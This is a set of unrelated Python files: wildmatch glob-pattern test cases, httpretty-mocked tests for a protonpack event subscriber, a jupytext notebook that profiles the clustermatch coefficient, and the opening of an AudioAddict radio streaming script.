self.match_wild_star(u'a[]]b', u'a]b', True)
self.match_wild_star(u'a[]-]b', u'a-b', True)
self.match_wild_star(u'a[]-]b', u'a]b', True)
self.match_wild_star(u'a[]-]b', u'aab', False)
self.match_wild_star(u'a[]a-]b', u'aab', True)
self.match_wild_star(u']', u']', True)
# Extended slash-matching features
self.match_wild_star(u'foo*bar', u'foo/baz/bar', False)
# self.match_wild_star(u'foo**bar', u'foo/baz/bar', False)
# self.match_wild_star(u'foo**bar', u'foobazbar', False)
self.match_wild_star(u'foo/**/bar', u'foo/baz/bar', True)
self.match_wild_star(u'foo/**/**/bar', u'foo/baz/bar', True)
self.match_wild_star(u'foo/**/bar', u'foo/b/a/z/bar', True)
self.match_wild_star(u'foo/**/**/bar', u'foo/b/a/z/bar', True)
self.match_wild_star(u'foo/**/bar', u'foo/bar', True)
self.match_wild_star(u'foo/**/**/bar', u'foo/bar', True)
self.match_wild_star(u'foo?bar', u'foo/bar', False)
self.match_wild_star(u'foo[/]bar', u'foo/bar', False)
self.match_wild_star(u'f[^eiu][^eiu][^eiu][^eiu][^eiu]r', u'foo/bar', False)
self.match_wild_star(u'f[^eiu][^eiu][^eiu][^eiu][^eiu]r', u'foo-bar', True)
self.match_wild_star(u'**/foo', u'foo', True)
self.match_wild_star(u'**/foo', u'/foo', True)
self.match_wild_star(u'**/foo', u'bar/baz/foo', True)
self.match_wild_star(u'*/foo', u'bar/baz/foo', False)
self.match_wild_star(u'**/bar*', u'foo/bar/baz', False)
# File/directory distinction
self.match_wild_star(u'**/bar/*', u'deep/foo/bar/baz', True)
self.match_wild_star(u'**/bar/*', u'deep/foo/bar/baz/', False)
self.match_wild_star(u'**/bar/**', u'deep/foo/bar/baz/', True)
self.match_wild_star(u'**/bar/*', u'deep/foo/bar', False)
self.match_wild_star(u'**/bar/**', u'deep/foo/bar/', True)
# self.match_wild_star(u'**/bar**', u'foo/bar/baz', False)
self.match_wild_star(u'*/bar/**', u'foo/bar/baz/x', True)
self.match_wild_star(u'*/bar/**', u'deep/foo/bar/baz/x', False)
self.match_wild_star(u'**/bar/*/*', u'deep/foo/bar/baz/x', True)
# Various additional tests
self.match_wild_star(u'a[c-c]st', u'acrt', False)
self.match_wild_star(u'a[c-c]rt', u'acrt', True)
self.match_wild_star(u'[!]-]', u']', False)
self.match_wild_star(u'[!]-]', u'a', True)
self.match_wild_star(u'\\', u'', None)
self.match_wild_star(u'\\', u'\\', None)
self.match_wild_star(u'*/\\', u'/\\', None)
self.match_wild_star(u'*/\\\\', u'/\\', True)
self.match_wild_star(u'foo', u'foo', True)
self.match_wild_star(u'@foo', u'@foo', True)
self.match_wild_star(u'@foo', u'foo', False)
self.match_wild_star(u'\\[ab]', u'[ab]', True)
# self.match_wild_star(u'[[]ab]', u'[ab]', True)
# self.match_wild_star(u'[[:]ab]', u'[ab]', True)
# self.match_wild_star(u'[[::]ab]', u'[ab]', False)
# self.match_wild_star(u'[[:digit]ab]', u'[ab]', True)
# self.match_wild_star(u'[\\[:]ab]', u'[ab]', True)
self.match_wild_star(u'\\??\\?b', u'?a?b', True)
self.match_wild_star(u'\\a\\b\\c', u'abc', True)
self.match_wild_star(u'', u'foo', False)
self.match_wild_star(u'**/t[o]', u'foo/bar/baz/to', True)
# Character class tests
#
# self.match_wild_star(u'[[:alpha:]][[:digit:]][[:upper:]]', u'a1B', True)
# self.match_wild_star(u'[[:digit:][:upper:][:space:]]', u'a', False)
# self.match_wild_star(u'[[:digit:][:upper:][:space:]]', u'A', True)
# self.match_wild_star(u'[[:digit:][:upper:][:space:]]', u'1', True)
# self.match_wild_star(u'[[:digit:][:upper:][:spaci:]]', u'1', False)
# self.match_wild_star(u'[[:digit:][:upper:][:space:]]', u' ', True)
# self.match_wild_star(u'[[:digit:][:upper:][:space:]]', u'.', False)
# self.match_wild_star(u'[[:digit:][:punct:][:space:]]', u'.', True)
# self.match_wild_star(u'[[:xdigit:]]', u'5', True)
# self.match_wild_star(u'[[:xdigit:]]', u'f', True)
# self.match_wild_star(u'[[:xdigit:]]', u'D', True)
# self.match_wild_star(u'[[:alnum:][:alpha:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:][:xdigit:]]', u'_', True)
# self.match_wild_star(u'[^[:alnum:][:alpha:][:blank:][:cntrl:][:digit:][:lower:][:space:][:upper:][:xdigit:]]', u'.', True)
# self.match_wild_star(u'[a-c[:digit:]x-z]', u'5', True)
# self.match_wild_star(u'[a-c[:digit:]x-z]', u'b', True)
# self.match_wild_star(u'[a-c[:digit:]x-z]', u'y', True)
# self.match_wild_star(u'[a-c[:digit:]x-z]', u'q', False)
# Additional tests, including some malformed wildmatch patterns
self.match_wild_star(u'[\\\\-^]', u']', True)
self.match_wild_star(u'[\\\\-^]', u'[', False)
self.match_wild_star(u'[\\-_]', u'-', True)
self.match_wild_star(u'[\\]]', u']', True)
self.match_wild_star(u'[\\]]', u'\\]', False)
self.match_wild_star(u'[\\]]', u'\\', False)
self.match_wild_star(u'a[]b', u'ab', None)
self.match_wild_star(u'a[]b', u'a[]b', None)
self.match_wild_star(u'ab[', u'ab[', None)
self.match_wild_star(u'[!', u'ab', None)
self.match_wild_star(u'[-', u'ab', None)
self.match_wild_star(u'[-]', u'-', True)
self.match_wild_star(u'[a-', u'-', None)
self.match_wild_star(u'[!a-', u'-', None)
self.match_wild_star(u'[--A]', u'-', True)
self.match_wild_star(u'[--A]', u'5', True)
self.match_wild_star(u'[ --]', u' ', True)
self.match_wild_star(u'[ --]', u'$', True)
self.match_wild_star(u'[ --]', u'-', True)
self.match_wild_star(u'[ --]', u'0', False)
self.match_wild_star(u'[---]', u'-', True)
self.match_wild_star(u'[------]', u'-', True)
self.match_wild_star(u'[a-e-n]', u'j', False)
self.match_wild_star(u'[a-e-n]', u'-', True)
self.match_wild_star(u'[!------]', u'a', True)
self.match_wild_star(u'[]-a]', u'[', False)
self.match_wild_star(u'[]-a]', u'^', True)
self.match_wild_star(u'[!]-a]', u'^', False)
self.match_wild_star(u'[!]-a]', u'[', True)
self.match_wild_star(u'[a^bc]', u'^', True)
self.match_wild_star(u'[a-]b]', u'-b]', True)
self.match_wild_star(u'[\\]', u'\\', None)
self.match_wild_star(u'[\\\\]', u'\\', True)
self.match_wild_star(u'[!\\\\]', u'\\', False)
self.match_wild_star(u'[A-\\\\]', u'G', True)
self.match_wild_star(u'b*a', u'aaabbb', False)
self.match_wild_star(u'*ba*', u'aabcaa', False)
self.match_wild_star(u'[,]', u',', True)
self.match_wild_star(u'[\\\\,]', u',', True)
self.match_wild_star(u'[\\\\,]', u'\\', True)
self.match_wild_star(u'[,-.]', u'-', True)
self.match_wild_star(u'[,-.]', u'+', False)
self.match_wild_star(u'[,-.]', u'-.]', False)
self.match_wild_star(u'[\\1-\\3]', u'2', True)
self.match_wild_star(u'[\\1-\\3]', u'3', True)
self.match_wild_star(u'[\\1-\\3]', u'4', False)
self.match_wild_star(u'[[-\\]]', u'\\', True)
self.match_wild_star(u'[[-\\]]', u'[', True)
self.match_wild_star(u'[[-\\]]', u']', True)
self.match_wild_star(u'[[-\\]]', u'-', False)
# Test for git's implementation (recursion and abort code)
self.match_wild_star(u'-*-*-*-*-*-*-12-*-*-*-m-*-*-*', u'-adobe-courier-bold-o-normal--12-120-75-75-m-70-iso8859-1', True)
self.match_wild_star(u'-*-*-*-*-*-*-12-*-*-*-m-*-*-*', u'-adobe-courier-bold-o-normal--12-120-75-75-X-70-iso8859-1', False)
self.match_wild_star(u'-*-*-*-*-*-*-12-*-*-*-m-*-*-*', u'-adobe-courier-bold-o-normal--12-120-75-75-/-70-iso8859-1', False)
self.match_wild_star(u'XXX/*/*/*/*/*/*/12/*/*/*/m/*/*/*', u'XXX/adobe/courier/bold/o/normal//12/120/75/75/m/70/iso8859/1', True)
self.match_wild_star(u'XXX/*/*/*/*/*/*/12/*/*/*/m/*/*/*', u'XXX/adobe/courier/bold/o/normal//12/120/75/75/X/70/iso8859/1', False)
self.match_wild_star(u'**/*a*b*g*n*t', u'abcd/abcdefg/abcdefghijk/abcdefghijklmnop.txt', True)
self.match_wild_star(u'**/*a*b*g*n*t', u'abcd/abcdefg/abcdefghijk/abcdefghijklmnop.txtz', False)
self.match_wild_star(u'*/*/*', u'foo', False)
self.match_wild_star(u'*/*/*', u'foo/bar', False)
self.match_wild_star(u'*/*/*', u'foo/bba/arr', True)
self.match_wild_star(u'*/*/*', u'foo/bb/aa/rr', False)
self.match_wild_star(u'**/**/**', u'foo/bb/aa/rr', True)
self.match_wild_star(u'*X*i', u'abcXdefXghi', True)
self.match_wild_star(u'*X*i', u'ab/cXd/efXg/hi', False)
self.match_wild_star(u'*/*X*/*/*i', u'ab/cXd/efXg/hi', True)
self.match_wild_star(u'**/*X*/**/*i', u'ab/cXd/efXg/hi', True)
# Test path_name option
#
# self.match(u'foo', u'foo', True)
# self.match(u'fo', u'foo', False)
# self.match(u'foo/bar', u'foo/bar', True)
# self.match(u'foo/*', u'foo/bar', True)
# self.match(u'foo/*', u'foo/bba/arr', True)
# self.match(u'foo/**', u'foo/bba/arr', True)
# self.match(u'foo*', u'foo/bba/arr', True)
# self.match(u'foo**', u'foo/bba/arr', True)
# self.match(u'foo/*arr', u'foo/bba/arr', True)
# self.match(u'foo/**arr', u'foo/bba/arr', True)
# self.match(u'foo/*z', u'foo/bba/arr', False)
# self.match(u'foo/**z', u'foo/bba/arr', False)
# self.match(u'foo?bar', u'foo/bar', True)
# self.match(u'foo[/]bar', u'foo/bar', True)
# self.match(u'*/*/*', u'foo', False)
# self.match(u'*/*/*', u'foo/bar', True)
# self.match(u'*/*/*', u'foo/bba/arr', True)
# self.match(u'*/*/*', u'foo/bb/aa/rr', True)
# self.match(u'*X*i', u'abcXdefXghi', True)
# self.match(u'*/*X*/*/*i', u'ab/cXd/efXg/hi', True)
# self.match(u'*Xg*i', u'ab/cXd/efXg/hi', True)
#
# # Case-sensitivy features
#
# self.match_wild_star(u'[A-Z]', u'a', False)
# self.match_wild_star(u'[A-Z]', u'A', True)
# self.match_wild_star(u'[a-z]', u'A', False)
# self.match_wild_star(u'[a-z]', u'a', True)
# self.match_wild_star(u'[[:upper:]]', u'a', False)
# self.match_wild_star(u'[[:upper:]]', u'A', True)
# self.match_wild_star(u'[[:lower:]]', u'A', False)
# self.match_wild_star(u'[[:lower:]]', u'a', True)
# self.match_wild_star(u'[B-Za]', u'A', False)
# self.match_wild_star(u'[B-Za]', u'a', True)
# self.match_wild_star(u'[B-a]', u'A', False)
# self.match_wild_star(u'[B-a]', u'a', True)
# self.match_wild_star(u'[Z-y]', u'z', False)
# self.match_wild_star(u'[Z-y]', u'Z', True)
#
# self.match_case_fold(u'[A-Z]', u'a', True)
# self.match_case_fold(u'[A-Z]', u'A', True)
# self.match_case_fold(u'[a-z]', u'A', True)
# self.match_case_fold(u'[a-z]', u'a', True)
# self.match_case_fold(u'[[:upper:]]', u'a', True)
# self.match_case_fold(u'[[:upper:]]', u'A', True)
# self.match_case_fold(u'[[:lower:]]', u'A', True)
# self.match_case_fold(u'[[:lower:]]', u'a', True)
# self.match_case_fold(u'[B-Za]', u'A', True)
# self.match_case_fold(u'[B-Za]', u'a', True)
# self.match_case_fold(u'[B-a]', u'A', True)
# self.match_case_fold(u'[B-a]', u'a', True)
# self.match_case_fold(u'[Z-y]', u'z', True)
# self.match_case_fold(u'[Z-y]', u'Z', True)
# Additional tests
# self.match_wild_star(u'[[:space:]-\\]]', u'-', True)
self.match_wild_star(u'[]-z]', u'c', True)
self.match_wild_star(u'[]-z]', u'-', False)
# self.match_wild_star(u'[[:space:]-z]', u'c', False)
self.match_wild_star(u'foo', u'foo/bar', False)
self.match_wild_star(u'foo', u'bar/foo', False)
self.match_wild_star(u'foo', u'bar/foo/baz', False)
self.match_wild_star(u'foo/**/bar', u'foo//bar', True)
self.match_wild_star(u'foo]bar', u'foo]bar', True)
self.match_wild_star(u'foo[bar', u'foo[bar', None)
# self.match_wild_star(u'foo/**bar', u'foo/bar', False)
# self.match_wild_star(u'foo/**bar', u'foo/x/bar', False)
self.match_wild_star(u'deep/**', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/*****', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/******', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/***/**', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/***/***', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/**', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/**', u'deep/foo/bar/baz/x', True)
self.match_wild_star(u'deep/**/***/****/*****', u'deep/foo/bar/baz/x', True)
# def test_translate(self):
# # Basic wildmatch features
#
# self.translate(u'foo', u'\Afoo\Z')
# self.translate(u'???', u'\A[^/][^/][^/]\Z')
# self.translate(u'??', u'\A[^/][^/]\Z')
#
# # Extended slash-matching features
#
# self.translate(u'foo*bar', u'\Afoo[^/]*bar\Z')
# # u'foo/baz/bar' -> False
#
# self.translate(u'foo**bar', u'\A\Z')
# # u'foo/baz/bar' -> False
# # u'foobazbar' -> False
#
# self.translate(u'foo/**/bar', u'\Afoo/(?:.*/)*bar\Z')
# # u'foo/baz/bar' -> True
# # u'foo/b/a/z/bar' -> True
# # u'foo/bar' -> True
#
# self.translate(u'foo/**/**/bar', u'\Afoo/(?:.*/)*bar\Z')
# # u'foo/baz/bar' -> True
# # u'foo/b/a/z/bar' -> True
# # u'foo/bar' -> True
#
# self.translate(u'foo?bar', u'\Afoo[^/]bar\Z')
# # u'foo/bar' -> False
#
# self.translate(u'foo[/]bar', None)
# # u'foo/bar' -> False
#
# self.translate(u'', u'\A\Z')
# self.translate(u'', u'\A\Z')
#
#
#
# self.match_wild_star(u'f[^eiu][^eiu][^eiu][^eiu][^eiu]r', u'foo/bar', False)
# self.match_wild_star(u'f[^eiu][^eiu][^eiu][^eiu][^eiu]r', u'foo-bar', True)
# self.match_wild_star(u'**/foo', u'foo', True)
# self.match_wild_star(u'**/foo', u'/foo', True)
# self.match_wild_star(u'**/foo', u'bar/baz/foo', True)
# self.match_wild_star(u'*/foo', u'bar/baz/foo', False)
# self.match_wild_star(u'**/bar*', u'foo/bar/baz', False)
#
# # File/directory distinction
# self.match_wild_star(u'**/bar/*', u'deep/foo/bar/baz', True)
# self.match_wild_star(u'**/bar/*', u'deep/foo/bar/baz/', False)
# self.match_wild_star(u'**/bar/**', u'deep/foo/bar/baz/', True)
# self.match_wild_star(u'**/bar/*', u'deep/foo/bar', False)
# self.match_wild_star(u'**/bar/**', u'deep/foo/bar/', True)
# self.match_wild_star(u'**/bar**', u'foo/bar/baz', False)
# self.match_wild_star(u'*/bar/**', u'foo/bar/baz/x', True)
# self.match_wild_star(u'*/bar/**', u'deep/foo/bar/baz/x', False)
# self.match_wild_star(u'**/bar/*/*', u'deep/foo/bar/baz/x', True)
def test_parse_bracket_expression(self):
# Empty bracket expression is invalid
self.parse_bracket_expression(
u'[]',
None)
# Single character
self.parse_bracket_expression(
u'[a]',
True,
[
wildmatch._create_be_collating_element(u'a'),
])
# Multiple characters
self.parse_bracket_expression(
u'[abc]',
True,
[
wildmatch._create_be_collating_element(u'a'),
wildmatch._create_be_collating_element(u'b'),
wildmatch._create_be_collating_element(u'c'),
])
# Range expression
self.parse_bracket_expression(
u'[a-b]',
True,
[
wildmatch._create_be_range(u'a', u'b'),
])
# Multi-character collating element
self.parse_bracket_expression(
u'[[.ab.]]',
True,
[
wildmatch._create_be_collating_element(u'ab'),
])
# Equivalence class
self.parse_bracket_expression(
u'[[=ab=]]',
True,
[
wildmatch._create_be_equivalence_class(u'ab'),
])
# Character class
self.parse_bracket_expression(
u'[[:alpha:]]',
True,
[
wildmatch._create_be_character_class(u'alpha'),
])
# Meta characters
self.parse_bracket_expression(
u'[]a-]',
True,
[
wildmatch._create_be_collating_element(u']'),
wildmatch._create_be_collating_element(u'a'),
wildmatch._create_be_collating_element(u'-'),
])
# Dash and range
self.parse_bracket_expression(
u'[-a-b]',
True,
[
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_range(u'a', u'b'),
])
# Dashes do not create ranges with classes
self.parse_bracket_expression(
u'[[:alpha:]-ab-[=c=]]',
True,
[
wildmatch._create_be_character_class(u'alpha'),
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_collating_element(u'a'),
wildmatch._create_be_collating_element(u'b'),
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_equivalence_class(u'c'),
])
# Complex expression
self.parse_bracket_expression(
u'[^][:alpha:]-a-[.ch.]--- --[=oe=]-b-]',
False,
[
wildmatch._create_be_collating_element(u']'),
wildmatch._create_be_character_class(u'alpha'),
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_range(u'a', u'ch'),
wildmatch._create_be_range(u'-', u'-'),
wildmatch._create_be_range(u' ', u'-'),
wildmatch._create_be_equivalence_class(u'oe'),
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_collating_element(u'b'),
wildmatch._create_be_collating_element(u'-'),
])
# Range with escaped literal
self.parse_bracket_expression(
u'[\\\\-^]',
True,
[
wildmatch._create_be_range(u'\\', u'^'),
])
# Escaped dash
self.parse_bracket_expression(
u'[\\-_]',
True,
[
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_collating_element(u'_'),
])
# Escaped end of bracket expression
self.parse_bracket_expression(
u'[\\]]',
True,
[
wildmatch._create_be_collating_element(u']'),
])
# Incomplete expression
self.parse_bracket_expression(
u'[',
None)
# Incomplete negated expression
self.parse_bracket_expression(
u'[!',
None)
# Incomplete expression with dash
self.parse_bracket_expression(
u'[-',
None)
# Dash matching
self.parse_bracket_expression(
u'[-]',
True,
[
wildmatch._create_be_collating_element(u'-'),
])
# Incomplete expression with a and dash
self.parse_bracket_expression(
u'[a-',
None)
# Incomplete negated expression with a and dash
self.parse_bracket_expression(
u'[!a-',
None)
# Range starting with dash
self.parse_bracket_expression(
u'[--A]',
True,
[
wildmatch._create_be_range(u'-', u'A'),
])
# Range ending with dash
self.parse_bracket_expression(
u'[ --]',
True,
[
wildmatch._create_be_range(u' ', u'-'),
])
# Chained range: the first range has priority
self.parse_bracket_expression(
u'[a-b-c]',
True,
[
wildmatch._create_be_range(u'a', u'b'),
wildmatch._create_be_collating_element(u'-'),
wildmatch._create_be_collating_element(u'c'),
])
# Range of dashes
self.parse_bracket_expression(
u'[---]',
True,
[
wildmatch._create_be_range(u'-', u'-'),
])
# Double range of dashes
self.parse_bracket_expression(
u'[------]',
True,
[
wildmatch._create_be_range(u'-', u'-'),
wildmatch._create_be_range(u'-', u'-'),
])
# Negated double range of dashes
self.parse_bracket_expression(
u'[!------]',
False,
[
wildmatch._create_be_range(u'-', u'-'),
wildmatch._create_be_range(u'-', u'-'),
])
# Range with right bracket
self.parse_bracket_expression(
u'[]-a]',
True,
[
wildmatch._create_be_range(u']', u'a'),
])
# Negated range with right bracket
self.parse_bracket_expression(
u'[!]-a]',
False,
[
wildmatch._create_be_range(u']', u'a'),
])
# Negated range with right bracket
self.parse_bracket_expression(
u'[!]-a]',
False,
[
wildmatch._create_be_range(u']', u'a'),
])
# Negation character as collating element
self.parse_bracket_expression(
u'[a^bc]',
True,
[
wildmatch._create_be_collating_element(u'a'),
wildmatch._create_be_collating_element(u'^'),
wildmatch._create_be_collating_element(u'b'),
wildmatch._create_be_collating_element(u'c'),
])
# Incomplete bracket expression caused by escape
self.parse_bracket_expression(
u'[\\]',
None)
# Match escape
self.parse_bracket_expression(
u'[\\\\]',
True,
[
wildmatch._create_be_collating_element(u'\\'),
])
# Negated escape matching
self.parse_bracket_expression(
u'[^\\\\]',
False,
[
wildmatch._create_be_collating_element(u'\\'),
])
# Range with escape
self.parse_bracket_expression(
u'[A-\\\\]',
True,
[
wildmatch._create_be_range(u'A', u'\\'),
])
# Range with punctuation
self.parse_bracket_expression(
u'[,-.]',
True,
[
wildmatch._create_be_range(u',', u'.'),
])
# Range similar to nested bracket expression
self.parse_bracket_expression(
u'[[-\\]]',
True,
[
wildmatch._create_be_range(u'[', u']'),
])
if __name__ == u'__main__':
unittest.main()
# File: tests/test_core_subscribe.py
import json
from uuid import uuid4
import httpretty
from protonpack.core import Event
from protonpack.core.subscribe import SubscriberManager, Subscriber, Protocol
from .test_utils import RedisRunnerContext
def test_create_and_list_streams():
with RedisRunnerContext():
subs = SubscriberManager.list_subscribers()
existing_len = len(subs)
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
ok = SubscriberManager.put_subscriber(subscriber)
assert ok is True
subs = SubscriberManager.list_subscribers()
assert existing_len + 1 == len(subs)
this_one = None
for sub in subs:
if sub.subscriber_name == subscriber.subscriber_name:
this_one = sub
break
assert this_one is not None
print(this_one.to_dict())
print(subscriber.to_dict())
assert this_one.stream == subscriber.stream
assert this_one.subscriber_name == subscriber.subscriber_name
assert set(this_one.topics) == set(subscriber.topics)
assert set(this_one.evt_types) == set(subscriber.evt_types)
assert set(this_one.activities) == set(subscriber.activities)
assert this_one.protocol == subscriber.protocol
assert this_one.endpoint == subscriber.endpoint
assert this_one == subscriber
def test_del_subscriber():
with RedisRunnerContext():
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
ok = SubscriberManager.put_subscriber(subscriber)
assert ok is True
subs = SubscriberManager.list_subscribers()
assert len(subs) == 1
for sub in subs:
SubscriberManager.del_subscriber(sub)
subs = SubscriberManager.list_subscribers()
assert len(subs) == 0
@httpretty.activate
def test_handle_event():
httpretty.register_uri(
httpretty.POST,
"http://example.com",
body='{"origin": "127.0.0.1"}'
)
with RedisRunnerContext():
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
event = Event(
event_id="test-event-",
topic="system",
evt_type="SYS",
activity="init",
ref_id="00",
)
ok = subscriber.handle_event(event, "consumer_group", "consumer_id")
assert ok
called = httpretty.last_request()
body = json.loads(called.body)
assert body["stream"] == subscriber.stream
assert body["event"]["event_id"] == event.event_id
assert body["event"]["topic"] == event.topic
assert body["event"]["evt_type"] == event.evt_type
assert body["event"]["activity"] == event.activity
assert body["event"]["ref_id"] == event.ref_id
assert body["consumer_group"] == "consumer_group"
assert body["consumer_id"] == "consumer_id"
assert body["subscriber_name"] == subscriber.subscriber_name
@httpretty.activate
def test_handle_event_mismatch_topic():
httpretty.register_uri(
httpretty.POST,
"http://example.com",
body='{"origin": "127.0.0.1"}'
)
with RedisRunnerContext():
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
event = Event(
event_id="test-event-",
topic="jazz",
evt_type="SYS",
activity="init",
ref_id="00",
)
ok = subscriber.matches(event)
assert ok is False
assert httpretty.has_request() is False
@httpretty.activate
def test_handle_event_mismatch_evt_type():
httpretty.register_uri(
httpretty.POST,
"http://example.com",
body='{"origin": "127.0.0.1"}'
)
with RedisRunnerContext():
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
event = Event(
event_id="test-event-",
topic="system",
evt_type="BOM",
activity="init",
ref_id="00",
)
ok = subscriber.matches(event)
assert ok is False
assert httpretty.has_request() is False
@httpretty.activate
def test_handle_event_mismatch_activities():
httpretty.register_uri(
httpretty.POST,
"http://example.com"
)
with RedisRunnerContext():
subscriber = Subscriber(
stream=uuid4().hex,
subscriber_name=uuid4().hex,
topics=["system"],
evt_types=["SYS"],
activities=["init", "verb"],
protocol=Protocol.HTTP,
endpoint="http://example.com"
)
event = Event(
event_id="test-event-",
topic="system",
evt_type="SYS",
activity="write",
ref_id="00",
)
ok = subscriber.matches(event)
assert ok is False
assert httpretty.has_request() is False
# ---
# jupyter:
# jupytext:
# cell_metadata_filter: all,-execution,-papermill,-trusted
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.11.5
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# %% [markdown] tags=[]
# # Description
# %% [markdown] tags=[]
# Exactly the same code as in `08`, but here I run the notebook on a different machine (a desktop).
# %% [markdown] tags=[]
# # Remove pycache dir
# %% tags=[]
# !echo ${CODE_DIR}
# %% tags=[]
# !find ${CODE_DIR} -regex '^.*\(__pycache__\)$' -print
# %% tags=[]
# !find ${CODE_DIR} -regex '^.*\(__pycache__\)$' -prune -exec rm -rf {} \;
# %% tags=[]
# !find ${CODE_DIR} -regex '^.*\(__pycache__\)$' -print
# %% [markdown] tags=[]
# # Modules
# %% tags=[]
import numpy as np
from clustermatch.coef import cm
# %% [markdown] tags=[]
# # Settings
# %% tags=[]
N_REPS = 10
# %% tags=[]
np.random.seed(0)
# %% [markdown] tags=[]
# # Setup
# %% tags=[]
# let numba compile all the code before profiling
cm(np.random.rand(10), np.random.rand(10))
# %% [markdown] tags=[]
# # Run with `n_samples` small
# %% [markdown] tags=[]
# ## `n_samples=50`
# %% tags=[]
N_SAMPLES = 50
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_small_50.txt
func()
# %% [markdown] tags=[]
# ## `n_samples=100`
# %% tags=[]
N_SAMPLES = 100
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_small_100.txt
func()
# %% [markdown] tags=[]
# ## `n_samples=500`
# %% tags=[]
N_SAMPLES = 500
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_small_500.txt
func()
# %% [markdown] tags=[]
# ## `n_samples=1000`
# %% tags=[]
N_SAMPLES = 1000
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_small_1000.txt
func()
# %% [markdown] tags=[]
# # Run with `n_samples` large
# %% [markdown] tags=[]
# ## `n_samples=50000`
# %% tags=[]
N_SAMPLES = 50000
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_large_50000.txt
func()
# %% [markdown] tags=[]
# ## `n_samples=100000`
# %% tags=[]
N_SAMPLES = 100000
# %% tags=[]
x = np.random.rand(N_SAMPLES)
y = np.random.rand(N_SAMPLES)
# %% tags=[]
def func():
for i in range(N_REPS):
cm(x, y)
# %% tags=[]
# %%timeit func()
func()
# %% tags=[]
# %%prun -s cumulative -l 20 -T 09-n_samples_large_100000.txt
func()
# %% tags=[]
|
#!/usr/bin/env python
import sys
import subprocess
import random
import json
import urllib2
import itertools
import os.path
import time
import hashlib
from functools import wraps
try:
from bs4 import BeautifulSoup
except ImportError:
try:
from BeautifulSoup import BeautifulSoup
except ImportError:
BeautifulSoup = None
class InvalidMode(Exception): pass
class InvalidStream(Exception): pass
class StreamError(Exception): pass
class ConfigError(Exception): pass
MODES = ['di', 'sky']
QUALITIES = {
'mp3': [
'premium_high', #256k
'premium', #128k
'public3', #96k
],
'aac': [
'premium_medium', #64k
'premium_low', #40k
'public2', #40k
],
# 'wma': [
# 'premium_wma', #128k
# 'premium_wma_low', #64k
# 'public5', #40k
# ],
}
DEFAULT_PLAYER = 'mplayer -really-quiet {stream_url}'
def identify_stream(wrapped):
@wraps(wrapped)
def wrapper(self, stream=None, **kwargs):
if stream is None:
stream = self._identify_stream(**kwargs)
return wrapped(self, stream)
return wrapper
def identify_stream_and_mode(wrapped):
@wraps(wrapped)
@identify_stream
def wrapper(self, stream, mode=None):
if mode is None:
mode = self._identify_stream_mode(stream)
return wrapped(self, stream, mode)
return wrapper
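# Hypothetical illustration (not part of the original script): the decorators
# above let the public methods accept either an explicit `stream` dict or
# keyword lookups that `_identify_stream` resolves against the stream list.
# For example (the station key below is made up):
#
#     site = AudioAddictSite(mode='di', quality='public3')
#     site.get_stream_url(key='somestation')         # resolved via _identify_stream
#     site.play_stream(stream=site.stream_list[0])   # explicit stream dict, no lookup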
class AudioAddictSite(object):
_mode = None
player = None
quality = None
STREAM_CACHE_TTL = 86400
def __init__(self, mode='all', quality='public3',
player=DEFAULT_PLAYER, **kwargs):
self._mode = mode
self.quality = quality
self.player = player
self._config = kwargs
self._soups = dict((m, None) for m in MODES)
@property
def stream_list(self):
if self._mode == 'all':
return list(itertools.chain.from_iterable(
self._get_stream_list(mode) for mode in MODES))
else:
return self._get_stream_list(self._mode)
@identify_stream_and_mode
